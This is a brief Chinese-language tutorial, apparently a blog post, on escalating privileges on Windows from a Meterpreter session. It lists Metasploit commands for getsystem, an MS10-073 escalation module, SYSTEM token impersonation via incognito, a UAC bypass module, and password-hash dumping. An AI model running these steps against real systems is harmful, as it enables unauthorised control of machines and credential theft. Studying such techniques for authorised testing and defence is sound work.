由于很多人都想知道meterpreter提权是怎么样的?这里就再简单的说一下吧!
一、getsystem提权
直接getsystem提权,最常用简单的办法;不过对于现在用的Metasploit Framework来说,此命令已经不好用了,会出现“Unknown command: getsystem.”,然后再用命令“use priv",又会出现“Failed to load extension: No module of the name priv found”。
meterpreter > getsystem
二、exp提权
很多人可能不知道什么是exp提权?特意简单的说一下:溢出提权,也就是exp提权。
以windows举例,溢出提权说白了,就是我们windows系统中出现的一些漏洞,漏洞的种类很多,所以大家在日常生活中,要经常对电脑更新补丁啊!而我们利用这些系统中存在的漏洞写出的 exp ,也就是漏洞利用工具,然后来辅助提权。
meterpreter > background //先后台运行会话[*] Backgrounding session 1…
msf > use post/windows/escalate/ms10_073_kbdlayout
msf > show options
msf > set session 1 //设置要使用的会话
msf post(ms10_073_kbdlayout) > exploit
注意:如果创建了一个system进程,就可以立马sessions 1进入会话,然后ps查看进程,使用migrate pid注入到进程。不过,现在用的Metasploit Framewor使用“migrate”命令会出现“Error running command migrate: NoMethodError undefined method `pid' for nil:NilClass”的提示。
或者直接使用以下命令:
meterpreter > run post/windows/escalate/ms10_073_kbdlayout
三、盗取令牌
meterpreter > use incognito //进入这个模块
meterpreter > list_tokens –u //查看存在的令牌
meterpreter > impersonate_token NT AUTXXXX\SYSTEM //令牌是DelegationTokens一列,getuid查看,两个斜杠
注意:只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌,一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的,建好的账户没有这个权限。使用菜刀(IIS服务器权限)反弹meterpreter是服务型权限。
四、Bypassuac
msf > use exploit/windows/local/bypassuac //32位与64位一样,其他几个模块也一样
msf > show options
msf > set session 4
msf > run //成功后会返回一个新的session,进入新会话,发现权限没变,使用getsystem即可完成提权
五、Hash
meterpreter > run post/windows/gather/smart_hashdump //读取hash这种做法最智能,效果最好。
总结:提权的方式真的是太多了,而且还有windows提权和linux提权,方法也各有不同。